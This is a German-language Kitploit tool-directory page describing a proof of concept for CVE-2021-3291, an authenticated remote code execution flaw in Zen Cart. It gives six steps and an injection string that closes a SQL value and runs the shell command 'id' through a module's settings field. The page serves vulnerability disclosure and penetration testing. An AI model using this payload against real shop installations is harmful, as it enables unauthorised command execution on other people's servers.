Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
zencart_auth_rce_poc — Authentifizierter Remote-Code-Execution-Exploit für Zen Cart über SQL-Injection bei der Bearbeitung von Admin-Modulen. Proof-of-Concept für CVE-2021-3291. | Kitploit
Tools/GitHubGitHub/kaanaryoverflow/zencart_auth_rce_poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubkaanaryoverflow/zencart_auth_rce_poc

zencart_auth_rce_poc

Authentifizierter Remote-Code-Execution-Exploit für Zen Cart über SQL-Injection bei der Bearbeitung von Admin-Modulen. Proof-of-Concept für CVE-2021-3291.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
72vor 5 JahrenNoch nicht geprüft

zencart_auth_rce_poc CVE-2021-3291

1-) Melden Sie sich als Admin an

2-) Öffnen Sie die Bearbeitungsseite eines beliebigen Moduls

3-) Untersuchen Sie das Element eines beliebigen 'true'-Radiobuttons

4-) Ändern Sie true zu true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //

5-) Klicken Sie auf Update

6-) Gehen Sie erneut zur Bearbeitungsseite, um den Befehl auszulösen

CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291

POC

Ausnutzung Befehl senden Seite aktualisieren Seite aktualisieren Zoom

Zoom

Metasploit

Screenshot 2021-01-27 00-03-55

GIF

Nachweis

Tool herunterladen